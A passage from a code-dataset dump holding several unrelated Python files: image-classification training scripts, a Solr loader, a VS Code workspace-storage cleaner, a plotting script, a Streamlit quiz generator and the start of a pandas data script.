io\r\nfrom skimage.transform import resize, rescale, rotate, setup, warp, AffineTransform\r\nimport pandas as pd\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\n\r\nclass net:\r\n @staticmethod\r\n def build(height,width,depth,num_classes):#Number of channels-1(grayscale),3(RGB)\r\n model=Sequential()\r\n shape=(height,width,depth)\r\n #Channel last ordering is default for tensorflow\r\n if K.image_data_format()==\"channels_first\":\r\n shape=(depth,height,width)\r\n #To add layers for model->Layer1\r\n model.add(Conv2D(30,(5,5),padding=\"same\",input_shape=shape))\r\n model.add(Activation(\"relu\"))\r\n model.add(MaxPooling2D(pool_size=(2,2),strides=(2,2)))#Moves 2 steps along x and y directions\r\n #Layer2\r\n model.add(Conv2D(60,(5,5),padding=\"same\"))#The same padding means zero padding is provided,whereas in VALID->No zero padding,values are dropped \r\n model.add(Activation(\"relu\"))\r\n model.add(MaxPooling2D(pool_size=(2,2),strides=(2,2)))\r\n #FUlly connected layer->We flatten out our inputs\r\n model.add(Flatten())\r\n model.add(Dense(500))\r\n model.add(Activation(\"relu\"))\r\n #Softmax classifier layer->This must have the same number of nodes as the output layer\r\n #Two types of softmax ->Full softmax(is good when the dataset is small),Candidate softmax(Better for larger sets)\r\n #This will yield the probability of each class\r\n model.add(Dense(num_classes))\r\n model.add(Activation(\"softmax\"))\r\n return model\r\n\r\ntotal_epoch=50\r\nlearning_rate=0.001\r\nbatch_size=50\r\n\r\ndata=[]\r\nlabels=[]\r\ntemp=[]\r\n\r\nfor root,sub,files in os.walk('G:\\pro'):\r\n for name in files:\r\n num=os.path.join(root,name)\r\n data.append(num)\r\n \r\nfor image in data:\r\n im1=io.imread(image)\r\n im2=resize(im1,(224,224))\r\n im3=img_to_array(im2)\r\n temp.append(im3)\r\n#temp contains images\r\nfor path in data:\r\n path=path.split(os.path.sep)[-2]\r\n if path=='India Gate':\r\n label=1\r\n labels.append(label)\r\n elif path=='Qutub Minar':\r\n label=2\r\n labels.append(label)\r\n elif path=='Taj Mahal':\r\n label=3\r\n labels.append(label)\r\n\r\n#labels contains labels\r\n\r\n#After obtaining images and labels,split them into train and test\r\n#scale the intensities to [0,1]\r\ntemp_array=np.array(temp,dtype=\"float\")/255.0\r\nlabel_array=np.array(labels)\r\n(trainX,testX,trainY,testY)=train_test_split(temp_array,label_array,test_size=0.20,random_state=42)\r\n#Convert integers to vectors\r\ntrainY= pd.get_dummies(trainY).values\r\ntestY=pd.get_dummies(testY).values#get them in the form of one hot labels in array\r\n#matrix multiplication with np.zeros\r\n\r\n#Next is data augmentation-TO increase the number of samples\r\naug = ImageDataGenerator(rotation_range=30, width_shift_range=0.1,\r\n\theight_shift_range=0.1, shear_range=0.2, zoom_range=0.2,\r\n\thorizontal_flip=True, fill_mode=\"nearest\")\r\n\r\nprint('Compiling model....')\r\nmodel=net.build(height=224,width=224,depth=3,num_classes=3)\r\nopt=Adam(lr=learning_rate,decay=learning_rate/total_epoch)\r\nmodel.compile(loss=\"binary_crossentropy\",optimizer=opt,metrics=[\"accuracy\"])\r\n\r\nprint(\"training network..........\")\r\ntrain_test_fit=model.fit_generator(aug.flow(trainX,trainY,batch_size=batch_size),validation_data=(testX,testY),steps_per_epoch=len(trainX)//batch_size,epochs=total_epoch,verbose=1)\r\n\r\nmodel.summary()#To give the summary of each of the layers.\r\ntest_pred=model.predict(testX)\r\ntest_pred=(test_pred>0.5)\r\ncm=confusion_matrix(testY.argmax(axis=1),test_pred.argmax(axis=1))\r\n\r\n\r\n","repo_name":"AditiDeepak/DL_App","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24941668140","text":"#! /usr/bin/python\n\n# To change this license header, choose License Headers in Project Properties.\n# To change this template file, choose Tools | Templates\n# and open the template in the editor.\n\n__author__ = \"Parama_Fadli_Kurnia\"\n__date__ = \"$Apr 12, 2016 5:03:30 PM$\"\n\nfrom py.solry import MakeSolr\n\nmsl = MakeSolr()\nlimit = 500000\noffset = 0\n\nmsl.insert_data(offset, limit)\n","repo_name":"fadlikurnia/solrpy","sub_path":"solrapi.py","file_name":"solrapi.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32431510464","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 14 23:20:22 2020\n实验8\n代码参考:\nhttp://datahacker.rs/tf-alexnet/\n\n@author: AlexNet\n\"\"\"\n\nimport datetime\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.losses import categorical_crossentropy\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.layers import Dense, Flatten, Conv2D, MaxPooling2D, Dropout\n\n\nimport urllib\nimport requests\nimport PIL.Image\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n#ship synset\npage = requests.get(\"http://www.image-net.org/api/text/imagenet.synset.geturls?wnid=n04194289\")\nsoup = BeautifulSoup(page.content, 'html.parser')\n#bicycle synset\nbikes_page = requests.get(\"http://www.image-net.org/api/text/imagenet.synset.geturls?wnid=n02834778\")\nbikes_soup = BeautifulSoup(bikes_page.content, 'html.parser')\n\nstr_soup=str(soup)\nsplit_urls=str_soup.split('\\r\\n')\n\nbikes_str_soup=str(bikes_soup)\nbikes_split_urls=bikes_str_soup.split('\\r\\n')\n\n#\n#!mkdir /content/train\n#!mkdir /content/train/ships\n#!mkdir /content/train/bikes\n#!mkdir /content/validation\n#!mkdir /content/validation/ships\n#!mkdir /content/validation/bikes\n\nimg_rows, img_cols = 32, 32\ninput_shape = (img_rows, img_cols, 3)\n\ndef url_to_image(url):\n resp = urllib.request.urlopen(url)\n image = np.asarray(bytearray(resp.read()), dtype=\"uint8\")\n image = cv2.imdecode(image, cv2.IMREAD_COLOR)\n return image\n\nn_of_training_images=100\nfor progress in range(n_of_training_images):\n if not split_urls[progress] == None:\n try:\n I = url_to_image(split_urls[progress])\n if (len(I.shape))==3:\n save_path = '/content/train/ships/img'+str(progress)+'.jpg'\n cv2.imwrite(save_path,I)\n except:\n None\n\nfor progress in range(n_of_training_images):\n if not bikes_split_urls[progress] == None:\n try:\n I = url_to_image(bikes_split_urls[progress])\n if (len(I.shape))==3:\n save_path = '/content/train/bikes/img'+str(progress)+'.jpg'\n cv2.imwrite(save_path,I)\n except:\n None\n\n\nfor progress in range(50):\n if not split_urls[progress] == None:\n try:\n I = url_to_image(split_urls[n_of_training_images+progress])\n if (len(I.shape))==3:\n save_path = '/content/validation/ships/img'+str(progress)+'.jpg'\n cv2.imwrite(save_path,I)\n except:\n None\n\n\nfor progress in range(50):\n if not bikes_split_urls[progress] == None:\n try:\n I = url_to_image(bikes_split_urls[n_of_training_images+progress])\n if (len(I.shape))==3:\n save_path = '/content/validation/bikes/img'+str(progress)+'.jpg'\n cv2.imwrite(save_path,I)\n except:\n None\nnum_classes = 2\n\n# AlexNet model\nclass AlexNet(Sequential):\n def __init__(self, input_shape, num_classes):\n super().__init__()\n\n self.add(Conv2D(96, kernel_size=(11,11), strides= 4,\n padding= 'valid', activation= 'relu',\n input_shape= input_shape,\n kernel_initializer= 'he_normal'))\n self.add(MaxPooling2D(pool_size=(3,3), strides= (2,2),\n padding= 'valid', data_format= None))\n\n self.add(Conv2D(256, kernel_size=(5,5), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n self.add(MaxPooling2D(pool_size=(3,3), strides= (2,2),\n padding= 'valid', data_format= None)) \n\n self.add(Conv2D(384, kernel_size=(3,3), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n\n self.add(Conv2D(384, kernel_size=(3,3), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n\n self.add(Conv2D(256, kernel_size=(3,3), strides= 1,\n padding= 'same', activation= 'relu',\n kernel_initializer= 'he_normal'))\n\n self.add(MaxPooling2D(pool_size=(3,3), strides= (2,2),\n padding= 'valid', data_format= None))\n\n self.add(Flatten())\n self.add(Dense(4096, activation= 'relu'))\n self.add(Dense(4096, activation= 'relu'))\n self.add(Dense(1000, activation= 'relu'))\n self.add(Dense(num_classes, activation= 'softmax'))\n\n self.compile(optimizer= tf.keras.optimizers.Adam(0.001),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel = AlexNet((227, 227, 3), num_classes)\n\n# some training parameters\nEPOCHS = 100\nBATCH_SIZE = 32\nimage_height = 227\nimage_width = 227\ntrain_dir = \"train\"\nvalid_dir = \"validation\"\nmodel_dir = \"my_model.h5\"\n\ntrain_datagen = ImageDataGenerator(\n rescale=1./255,\n rotation_range=10,\n width_shift_range=0.1,\n height_shift_range=0.1,\n shear_range=0.1,\n zoom_range=0.1)\n\ntrain_generator = train_datagen.flow_from_directory(train_dir,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=BATCH_SIZE,\n seed=1,\n shuffle=True,\n class_mode=\"categorical\")\n\nvalid_datagen = ImageDataGenerator(rescale=1.0/255.0)\nvalid_generator = valid_datagen.flow_from_directory(valid_dir,\n target_size=(image_height, image_width),\n color_mode=\"rgb\",\n batch_size=BATCH_SIZE,\n seed=7,\n shuffle=True,\n class_mode=\"categorical\"\n )\ntrain_num = train_generator.samples\nvalid_num = valid_generator.samples\n\nlog_dir=\"logs/fit/\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\ntensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)\ncallback_list = [tensorboard_callback]\n\n# start training\nmodel.fit(train_generator,\n epochs=EPOCHS,\n steps_per_epoch=train_num // BATCH_SIZE,\n validation_data=valid_generator,\n validation_steps=valid_num // BATCH_SIZE,\n callbacks=callback_list,\n verbose=0)\n\n# save the whole model\nmodel.save(model_dir)\n","repo_name":"yhily/deep-learning-resource","sub_path":"srcs/chap07/思考与练习/alex.py","file_name":"alex.py","file_ext":"py","file_size_in_byte":7123,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"3286603243","text":"import datetime as dt\nimport getpass\nimport json\nimport shutil\nimport sys\nfrom pathlib import Path\nfrom urllib.parse import unquote, urlparse\nimport readline\nfrom dataclasses import dataclass\n\nimport colorama\nfrom colorama import Back, Fore, Style\n\ncolorama.init()\n\n\ndef printWithColor(\n message: str,\n foreground_color: Fore = Fore.RESET,\n background_color: Back = Back.BLACK,\n end: str = \"\\n\",\n):\n \"\"\"Prints colored text if colorama is installed\n\n Args:\n message (str): The thing you want to print\n foreground_color (Fore): Foreground color of the text. Defaults to Fore.RESET.\n background_color (Back): Background coor of the text. Defaults to Back.BLACK.\n end (str, optional): end paramater of the print. Defaults to '\\n'.\n \"\"\"\n\n print(foreground_color + background_color + message + Style.RESET_ALL, end=end)\n\n@dataclass\nclass Folder:\n path: str\n workspace_exists: bool\n is_old: bool\n sizeinbytes: int\n\ndef format_size(size_bytes: int) -> str:\n \"\"\"Converts size as bytes to human readable format\n\n Args:\n size_bytes (int): Size to convert\n\n Returns:\n str: Human readable size in str format\n \"\"\"\n units = [\"B\", \"KB\", \"MB\", \"GB\", \"TB\"]\n size = size_bytes\n unit_index = 0\n while size >= 1024 and unit_index < len(units) - 1:\n size /= 1024\n unit_index += 1\n return f\"{size:.2f} {units[unit_index]}\"\n\n\ndef getDefaultWSSFolderPath() -> str:\n \"\"\"Returns default workspaceStorage path based on operating system that the script ran on\n\n Returns:\n str: Path of workspaceStorage folder\n \"\"\"\n username = getpass.getuser()\n\n if sys.platform in (\"linux\", \"linux2\"):\n return str(Path(f\"/home/{username}/.config/Code/User/workspaceStorage/\"))\n elif sys.platform == \"darwin\":\n return str(\n Path(\n f\"/Users/{username}/Library/Application Support/Code/User/workspaceStorage/\"\n )\n )\n elif sys.platform in (\"win32\", \"win64\"):\n return str(\n Path(f\"C:/Users/{username}/AppData/Roaming/Code/User/workspaceStorage/\")\n )\n\n return \"\"\n\n\ndef isValidWSSPath(path: str) -> bool:\n \"\"\"Checks if the given folder path is a valid workspaceStorage folder\n\n Args:\n path (str): Path to check\n\n Returns:\n bool: True if given folder path is a valid workspaceStorage folder\n \"\"\"\n if not Path(path).exists() or not Path(path).is_dir():\n return False\n\n folders = [content for content in Path(path).iterdir()]\n return all(\n Path( Path(path) / folder / \"workspace.json\" ).exists()\n for folder in folders\n )\n\n\ndef askForValidWSSPath() -> str:\n \"\"\"Continuously asks user for a valid workspaceStorage path\n\n Returns:\n str: A valid workspaceStorage path\n \"\"\"\n while True:\n path = input(\"Please enter a valid workspaceStorage path: \")\n if isValidWSSPath(path):\n return path\n\n\ndef askYesNoQuestion(\n questionBody: str, yes_patterns: list[str] = None, no_patterns: list[str] = None, return_for_none: bool = False\n) -> bool:\n \"\"\"Asks user a yes/no question.\n\n Args:\n questionBody (str): Body of the question\n yes_patterns (list[str], optional): Strings that are considered yes. User input is lowered by default so no need to put both lower and upper versions of the same string. Defaults to ['y', 'yes'].\n no_patterns (list[str], optional): Strings that are considered no. User input is lowered by default so no need to put both lower and upper versions of the same string.. Defaults to ['n', 'no'].\n\n Returns:\n bool: Returns true if lowered input is in yes_patterns, false if lowered input is in no_patterns\n \"\"\"\n if yes_patterns is None:\n yes_patterns = [\"y\", \"yes\"]\n if no_patterns is None:\n no_patterns = [\"n\", \"no\"]\n while True:\n print(questionBody, end=\"\")\n printWithColor(\" (\", Fore.MAGENTA, end=\"\")\n printWithColor(\"Y\" if return_for_none else \"y\", Fore.GREEN, end=\"\")\n printWithColor(\"/\", Fore.MAGENTA, end=\"\")\n printWithColor(\"N\" if not return_for_none else \"n\", Fore.RED, end=\"\")\n printWithColor(\")\", Fore.MAGENTA, end=\"\")\n inp = input(\": \")\n if inp.lower() in yes_patterns:\n return True\n elif inp.lower() in no_patterns:\n return False\n\n if not inp:\n return return_for_none\n\n printWithColor(\"Please provide a valid answer...\", Fore.RED)\n\n\ndef getSizeOfFolder(path: str) -> int:\n \"\"\"Calculates a foldersize recursively\n\n Args:\n path (str): Path to calculate size of\n\n Returns:\n int: Total size in bytes\n \"\"\"\n\n total_size = 0\n for full_path in Path(path).iterdir():\n if Path(full_path).is_file():\n total_size += Path(full_path).stat().st_size\n elif Path(full_path).is_dir():\n total_size += getSizeOfFolder(full_path)\n return total_size\n\n\ndef parseWSSFolder(path: str) -> list[Folder]:\n \"\"\"Parses workspaceStorage folder\n Args:\n path (str): workspaceStorage path\n Returns:\n list[Folder]: List of folders\n \"\"\"\n\n result_list: list[Folder] = []\n for folder_path in Path(path).iterdir():\n json_text = \"\"\n\n with (folder_path / \"workspace.json\").open(\"r\") as file:\n json_text = file.read()\n\n data = json.loads(json_text)\n\n if \"folder\" not in data:\n continue\n\n target_folder_name = Path(unquote(urlparse(data[\"folder\"]).path))\n\n # Consider a folder \"old\" if it isn't modified in the last 30 days\n last_modified = dt.datetime.fromtimestamp(Path(folder_path).stat().st_mtime)\n now = dt.datetime.now()\n delta = now - last_modified\n is_old = delta.days > 30\n\n result_list.append(\n Folder(\n path=str(folder_path),\n workspace_exists=target_folder_name.is_dir(),\n is_old=is_old,\n sizeinbytes=getSizeOfFolder(str(folder_path)),\n )\n )\n\n return result_list\n\ndef main():\n # Enable filesystem autocompletion\n readline.set_completer_delims('\\t\\n')\n readline.parse_and_bind('tab: complete')\n \n printWithColor(\"Looking for workspaceFolder path...\", Fore.BLUE)\n wss_path = getDefaultWSSFolderPath()\n\n if not wss_path:\n printWithColor(\"This OS is not supported.\", Fore.RED)\n return\n\n if not isValidWSSPath(wss_path):\n printWithColor(\"Script couldn't find workspaceStorage folder.\", Fore.YELLOW)\n askForValidWSSPath()\n else:\n printWithColor(f\"Found workspaceStorage folder in {wss_path}\", Fore.GREEN)\n if askYesNoQuestion(\"Do you want to provide an alternative path?\"):\n askForValidWSSPath()\n\n folders = parseWSSFolder(wss_path)\n # Mark old and/or unused workspaces as unwanted\n unwanted_folders = [x for x in folders if x.is_old or not x.workspace_exists]\n unwanted_size = sum(x.sizeinbytes for x in unwanted_folders)\n unwanted_size_formatted = format_size(unwanted_size)\n total_size = getSizeOfFolder(wss_path)\n total_size_formatted = format_size(total_size)\n\n if not unwanted_folders:\n printWithColor(\"No unwanted workspaceStorage folder found!\", Fore.GREEN)\n return\n\n percentage = round(100 * unwanted_size / total_size, 2)\n\n printWithColor(\"Found \", end=\"\")\n printWithColor(str(len(unwanted_folders)), Fore.CYAN, end=\"\")\n printWithColor(\n f\" folder{'s' if len(unwanted_folders) > 1 else ''} with total size of \", end=\"\"\n )\n printWithColor(unwanted_size_formatted, Fore.CYAN, end=\"\")\n printWithColor(f\". ({Fore.CYAN}{percentage}%{Fore.RESET} of total)\")\n\n if askYesNoQuestion(\n f\"Do you want to clear {Fore.CYAN}ALL{Fore.RESET} unwanted folders?\"\n ):\n try:\n for (i, folder) in enumerate(unwanted_folders):\n print(\n f\"\\rRemoving \\\"{Path(folder.path).name}\\\" \",\n end=\"\",\n )\n printWithColor(\"(\", Fore.MAGENTA, end=\"\")\n printWithColor(str(i + 1), Fore.CYAN, end=\"\")\n printWithColor(\"/\", Fore.MAGENTA, end=\"\")\n printWithColor(str(len(unwanted_folders)), Fore.CYAN, end=\"\")\n printWithColor(\")\", Fore.MAGENTA, end=\" \")\n shutil.rmtree(folder.path)\n print()\n printWithColor(\"Successfully cleared all unused folders!\", Fore.GREEN)\n except KeyboardInterrupt:\n printWithColor(\"Got KeyboardInterrupt. Aborting...\", Fore.RED)\n except Exception as e:\n printWithColor(\n f\"Caught an exception while removing folders: {e}. Aborting...\"\n )\n finally:\n return\n else:\n printWithColor(\"Aborting...\", Fore.RED)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n printWithColor(\"\\nGot KeyboardInterrupt. Aborting...\", Fore.RED)\n except Exception as e:\n printWithColor(f\"\\nGot an exception while executing script: {e}\", Fore.YELLOW)\n","repo_name":"DolphyWind/VSCode-WorkspaceStorage-Cleaner","sub_path":"workspaceStorage_cleaner.py","file_name":"workspaceStorage_cleaner.py","file_ext":"py","file_size_in_byte":9148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72568019074","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nn_lines = 12\nn_blocks = 12\nn_sub_block = 3\nn_per_block = n_blocks / n_sub_block\n\nL = 1.\ndx = L/n_blocks\ndata = np.zeros( (n_blocks, n_blocks) )\nx_lines = np.linspace(0,L,n_blocks+1)\n\nc_map = 'Paired'\nc_map = 'tab10'\noutDir = '/home/bruno/Desktop/gpu_anim/'\n\nfig, ax = plt.subplots(nrows=1, ncols=1)\nfig.set_size_inches(10,10)\nplt.tight_layout()\n\nn_image = 4\ncounter = 2\ndata_1 = np.zeros( (n_blocks, n_blocks) )\n \ni_block = 0\nj_block = 0\n\nfor i in range(n_blocks):\n for j in range(n_blocks):\n if ( i>=i_block*n_per_block and i<(i_block+1)*n_per_block and j>=j_block*n_per_block and j<(j_block+1)*n_per_block):\n data[i][j] = counter\n counter += 1\n if counter >= 11 : counter =2\n# \n# for i in range(n_blocks):\n# for j in range(n_blocks):\n# if ( i=n_blocks/2):\n# data[i][j] = counter\n# counter += 1\n# if counter >= 11 : counter =1\n# \n# for i in range(n_blocks):\n# for j in range(n_blocks):\n# if ( i>=n_blocks/2 and j= 11 : counter =1\n# \n# for i in range(n_blocks):\n# for j in range(n_blocks):\n# if ( i>=n_blocks/2 and j>=n_blocks/2):\n# data[i][j] = counter\n# counter += 1\n# if counter >= 11 : counter =1\n\n\nax.imshow(data, extent=(0,1,0,1), cmap=c_map, vmin=1, vmax=10)\nax.vlines(x_lines, ymin=0, ymax=1, colors='w')\nax.hlines(x_lines, xmin=0, xmax=1, colors='w')\n\n\nax.set_xlim(0,1)\nax.set_ylim(0,1)\nax.set_facecolor('xkcd:black')\nax.yaxis.set_visible('false')\nax.xaxis.set_visible('false')\nax.set_xticklabels([])\nax.set_yticklabels([])\nfig.savefig( outDir + 'gpu_model_{0}.png'.format(n_image), pad_inches=0, bbox_inches='tight')\nn_image += 1\n\n# \n# from shutil import copyfile\n# offset= 5\n# n = 0\n# for n in range(1,10):\n# for i in range(0,5):\n# src = outDir + 'gpu_model_{0}.png'.format(i)\n# dst = outDir + 'gpu_model_{0}.png'.format(i + n*offset )\n# copyfile(src, dst)\n","repo_name":"bvillasen/cosmo_sims","sub_path":"plotting/gpu_model.py","file_name":"gpu_model.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24333674406","text":"from random import sample\nfrom typing import List\n\nimport pandas as pd\nimport streamlit as st\n\n\n# Functions ===================================================================\n@st.cache_data\ndef get_data():\n qna_csv = st.secrets[\"QNA_CSV\"]\n df = pd.read_csv(qna_csv)\n df.dropna(inplace=True, axis=0, subset=[\"Question\", \"Answer\"])\n df[\"Choices\"] = (\n df[\"Choices\"].str.split(\";\").apply(lambda x: [item.strip() for item in x])\n )\n df[\"Tags\"] = df[\"Tags\"].str.split(\";\").apply(lambda x: [item.strip() for item in x])\n return df\n\n\n@st.cache_data\ndef get_tag_list(df: pd.DataFrame) -> List[str]:\n \"\"\"\n Returns a list of unique tags from the given DataFrame.\n\n Args:\n df (pd.DataFrame): The DataFrame containing the tags.\n\n Returns:\n List[str]: A list of unique tags.\n \"\"\"\n tags = [tag for tags in df[\"Tags\"] for tag in tags]\n return list(set(tags))\n\n\ndef load_fanfare(n):\n import base64\n\n if n > 9000:\n fanfare_file = open(\"assets/fanfare_9999.mp3\", \"rb\")\n elif n > 75:\n fanfare_file = open(\"assets/fanfare_100.mp3\", \"rb\")\n elif n > 50:\n fanfare_file = open(\"assets/fanfare_75.mp3\", \"rb\")\n elif n > 25:\n fanfare_file = open(\"assets/fanfare_50.mp3\", \"rb\")\n elif n > 10:\n fanfare_file = open(\"assets/fanfare_25.mp3\", \"rb\")\n else:\n fanfare_file = open(\"assets/fanfare_5.mp3\", \"rb\")\n fanfare_html = f'\\n'\n return fanfare_html\n\n\ndef generate_50_set(df, tags):\n filtered_df = df[\n df[\"Tags\"].apply(lambda x: any(item in x for item in selected_tags))\n ].copy()\n filtered_df.sort_values(by=\"ID\").reset_index(inplace=True, drop=True)\n filtered_df = filtered_df.sample(n=50, replace=False).sort_values(by=\"ID\")\n filtered_df.reset_index(inplace=True, drop=True)\n for index, row in filtered_df.iterrows():\n # Create Question Number\n filtered_df.loc[index, \"QNum\"] = f\"Q-{index + 1}\"\n filtered_df[\"Correct\"] = False\n filtered_df[\"Done\"] = False\n filtered_df = filtered_df[\n [\"ID\", \"QNum\", \"Correct\", \"Done\", \"Question\", \"Choices\", \"Answer\", \"Tags\"]\n ]\n return filtered_df.copy()\n\n\n# Setup =======================================================================\nst.set_page_config(page_title=\"Problem Set Generator\", page_icon=\"🔁\")\nst.title(\"The Generator\")\n\nif \"auth\" not in st.session_state:\n st.session_state[\"auth\"] = False\nif \"access\" not in st.session_state:\n st.session_state[\"access\"] = False\n\ndf = get_data()\ntags = get_tag_list(df)\n\n\n# Main ========================================================================\n\nif not st.session_state[\"access\"]:\n st.info(\n \"**You do not have access to the generator.** Please contact the site owner for access.\",\n icon=\"🔒\",\n )\nelse:\n st.success(\" **Generator enabled.**\", icon=\"🟢\")\n\nwith st.expander(\"**Problem Set Generator** ⚙\", expanded=True):\n selected_tags = st.multiselect(\"Select Tags\", tags, default=[\"CHE\"])\n st.session_state[\"selected_tags\"] = selected_tags.copy()\n filtered_df = df[\n df[\"Tags\"].apply(lambda x: any(item in x for item in selected_tags))\n ].copy()\n filtered_df.sort_values(by=\"ID\").reset_index(inplace=True, drop=True)\n\n if len(filtered_df) == 0:\n st.error(\"**No questions found!** Please select some tags.\", icon=\"❗\")\n # st.button(\"Generate Problem Set\", disabled=True)\n else:\n if len(filtered_df) > 1:\n num_questions = st.slider(\n \"Number of questions to generate:\",\n min_value=1,\n max_value=len(filtered_df),\n value=len(filtered_df),\n )\n filtered_df = filtered_df.sample(n=num_questions, replace=False)\n else:\n st.info(\" **Only _:red[one]_ question found.**\", icon=\"ℹ️\")\n\n filtered_df.reset_index(inplace=True, drop=True)\n for index, row in filtered_df.iterrows():\n # Create Question Number\n filtered_df.loc[index, \"QNum\"] = f\"Q-{index + 1}\"\n filtered_df[\"Choices\"][index] = sample(row[\"Choices\"], k=4)\n\n filtered_df[\"Correct\"] = False\n filtered_df[\"Done\"] = False\n filtered_df = filtered_df[\n [\"ID\", \"QNum\", \"Correct\", \"Done\", \"Question\", \"Choices\", \"Answer\", \"Tags\"]\n ]\n\n # st.divider()\n generate = st.button(\n \"Generate!\", type=\"primary\", disabled=(not st.session_state[\"access\"])\n )\n\n if generate:\n st.session_state[\"problem_set\"] = filtered_df.copy()\n st.balloons()\n st.toast(\n f\"**:blue[{str(len(filtered_df)).zfill(1)} Questions] generated.** \\nProblem Set ready!\",\n icon=\"🎉\",\n )\n\n# st.divider()\n\n# st.subheader(\"Quick Configs\")\n\n# acol1, acol2, _fill1 = st.columns(3)\n# with acol1:\n# set_pcp = st.button(\"Generate **50 PCP Problems**\", key=\"pcp\")\n# set_gen = st.button(\"Generate **50 GEN Problems**\", key=\"gen\")\n\n# with acol2:\n# set_che = st.button(\"Generate **50 CHE Problems**\", key=\"che\")\n# set_mix = st.button(\"Generate **50 MIX Problems**\", key=\"mix\")\n\n# if set_pcp:\n# set_tags = [\"PCP\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n# elif set_gen:\n# set_tags = [\"GEN\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n# elif set_che:\n# set_tags = [\"CHE\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n# elif set_mix:\n# set_tags = [\"PCP\", \"GEN\", \"CHE\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n\n# st.session_state[\"problem_set\"]\n\n# Sidebar settings\nwith st.sidebar:\n st.warning(\n \"ALL PROGRESS IS LOST when you close the tab or press F5 on the page!\",\n icon=\"⚠️\",\n )\n with st.expander(\"Other Settings ⚙\", expanded=True):\n audio_on = st.checkbox(\"🔊 **Enable Fanfare?**\", value=True)\n access_key = st.text_input(\n \"Enter access key to enable generator:\", type=\"password\"\n )\n if st.button(\"Access!\"):\n if access_key == st.secrets[\"ACCESS_KEY\"]:\n st.session_state[\"access\"] = True\n st.toast(\"Access Granted!\", icon=\"🔓\")\n st.experimental_rerun()\n else:\n st.session_state[\"access\"] = False\n st.experimental_rerun()\n\n with st.expander(\"Secret Settings\"):\n password = st.text_input(\"Enter Password to Enable:\", type=\"password\")\n if st.button(\"Submit\", type=\"primary\"):\n if password == st.secrets[\"PASSWORD\"]:\n st.balloons()\n st.toast(\"Authenticated.\", icon=\"🔓\")\n st.session_state[\"auth\"] = True\n else:\n st.error(\"Denied.\", icon=\"🔒\")\n st.session_state[\"auth\"] = False\n\nif audio_on:\n try:\n if generate:\n st.session_state[\"fanfare\"] = load_fanfare(len(filtered_df))\n else:\n st.session_state[\"fanfare\"] = load_fanfare(1)\n except NameError:\n st.session_state[\"fanfare\"] = \"\"\nelse:\n st.session_state[\"fanfare\"] = \"\"\nst.session_state[\"playsound\"] = audio_on\n\nst.divider()\nst.subheader(\"About this Site\")\nst.markdown(\n \"\"\"\n This site was created to help me **generate problem sets** from a _random_ sample of questions.\n The question topics are for the Chemical Engineering Board exam that I've compiled in a CSV file.\n\n The site is built using **[Streamlit](https://streamlit.io)** and is hosted on **[Streamlit Cloud](https://share.streamlit.io/)**.\n\n The site currently has these pages:\n | | |\n | ------------- | --------------------------------------------------------------------------------------------------------------------- |\n | **Generator** | This page allows you to generate a problem set based on the tags you select and number of questions you want. |\n | **Quiz** | This page allows you to take the quiz. You can navigate through the questions using the buttons or the dropdown menu. |\n | **Results** | This page shows you the results of the quiz you took. It also shows you a run chart of your answers. |\n | **Analytics** | This page is specific to me and shows me the analytics of the questions I've answered over time. No peeking ;) |\n \"\"\",\n unsafe_allow_html=True,\n)\n","repo_name":"jskherman/che-pset","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":9168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33197288965","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 4 09:39:50 2022\n\n@author: lillianding\n\"\"\"\n\n#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\nimport numpy as np\nimport copy\nimport datetime\nimport collections\npd.options.mode.chained_assignment = None # default='warn'\n\n\n\n#waterfall = pd.read_excel('Waterfall Input.xlsx')\nMPP = pd.read_csv('MPP File.csv')\nMPP = MPP[MPP['Build BU Name'] == 'D9']\nMPP = MPP[MPP['EOP Fiscal Quarter'] >= '2021Q4']\nMPP = 